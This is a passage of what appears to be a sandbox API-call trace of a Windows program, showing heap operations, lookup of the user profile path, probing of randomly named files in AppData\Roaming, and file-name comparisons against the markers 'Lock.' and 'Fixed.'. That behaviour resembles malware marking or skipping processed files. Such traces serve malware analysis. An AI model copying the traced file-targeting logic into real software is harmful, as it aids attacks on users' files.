ftLastWriteTime.dwLowDateTime=0x29904190, ftLastWriteTime.dwHighDateTime=0x1d4cfbf, nFileSizeHigh=0x0, nFileSizeLow=0x182dd, dwReserved0=0xa68, dwReserved1=0x4, cFileName="fieUnO JbD.odp", cAlternateFileName="FIEUNO~1.ODP")) returned 0 [0198.617] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0198.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.617] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0198.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0198.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0198.617] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0198.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0198.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0198.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.618] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0198.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0198.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0198.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0198.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0198.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0198.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f1fe0 [0198.620] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/fieUnO JbD.odp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fieUnO JbD.odp", lpFilePart=0x8bf658*="fieUnO JbD.odp") returned 0x3c [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0198.620] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fieUnO JbD.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fieuno jbd.odp")) returned 0xffffffff [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.620] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0198.620] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.620] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0198.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0198.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0198.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0198.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0198.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0198.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f_H3Kw_rw4T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_H3Kw_rw4T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H3Kw_rw4T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Kw_rw4T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kw_rw4T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w_rw4T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_rw4T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rw4T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w4T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.621] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WXKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XKpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KpM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pM.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0198.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0198.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0198.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0198.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0198.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0198.622] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0198.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0198.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0198.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f_H3Kw_rw4T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_H3Kw_rw4T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H3Kw_rw4T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Kw_rw4T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kw_rw4T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w_rw4T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_rw4T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rw4T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w4T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WXKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XKpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KpM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pM.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0198.623] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0198.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0198.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0198.623] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0198.623] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0198.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0198.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0198.623] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0198.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0198.624] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0198.624] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0198.624] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.624] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.624] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.624] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.625] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/f_H3Kw_rw4T-WXKpM.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2cb33fd0, ftCreationTime.dwHighDateTime=0x1d4c574, ftLastAccessTime.dwLowDateTime=0xaeeadad0, ftLastAccessTime.dwHighDateTime=0x1d4d1e5, ftLastWriteTime.dwLowDateTime=0xaeeadad0, ftLastWriteTime.dwHighDateTime=0x1d4d1e5, nFileSizeHigh=0x0, nFileSizeLow=0x134a3, dwReserved0=0xa400039, dwReserved1=0x14350, cFileName="f_H3Kw_rw4T-WXKpM.m4a", cAlternateFileName="F_H3KW~1.M4A")) returned 0xaa5660 [0198.625] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0198.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0198.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0198.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.625] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0198.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0198.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: 